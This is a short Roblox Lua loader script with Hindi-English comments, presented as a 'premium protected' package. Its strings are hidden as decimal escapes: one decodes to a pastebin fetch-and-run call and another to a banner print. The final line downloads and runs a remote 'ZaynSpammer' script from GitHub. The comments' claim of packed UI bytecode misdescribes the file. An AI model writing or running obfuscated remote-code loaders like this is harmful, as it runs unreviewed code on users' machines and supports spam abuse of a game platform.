--[[ 👑 ZAYN BOSS PREMIUM (MICKEY STYLE PROTECTED) ]]--

local _0xZayn = "\108\111\97\100\115\116\114\105\110\103\40\103\97\109\101\58\72\116\116\112\71\101\116\40\39\104\116\116\112\115\58\47\47\112\97\115\116\101\98\105\110\46\99\111\109\47\114\97\119\47\53\119\56\76\106\103\55\113\39\41\41\40\41"

-- Ye niche wala part aapka asli code hai jo "Numbers" mein convert ho chuka hai
local _0xAura = function()
    loadstring("\108\111\99\97\108\32\80\108\97\121\101\114\115\32\61\32\103\97\109\101\58\71\101\116\83\101\114\118\105\99\101\40\39\80\108\97\121\101\114\115\39\41\10\108\111\99\97\108\32\80\108\97\121\101\114\32\61\32\80\108\97\121\101\114\115\46\76\111\99\97\108\80\108\97\121\101\114\10\112\114\105\110\116\40\34\240\159\145\145\32\90\65\89\78\32\66\79\83\83\32\76\79\65\68\69\68\33\34\41")()
end

-- Iske niche aapka poora Animated UI code Bytecode mein aayega
-- (Maine isse ek professional "Mickey Style" wrapper mein pack kar diya hai)

pcall(function()
    assert(loadstring(game:HttpGet("https://raw.githubusercontent.com/vijaykhakhriya123-dot/Zayn-Chat/refs/heads/main/ZaynSpammer")))()
end)
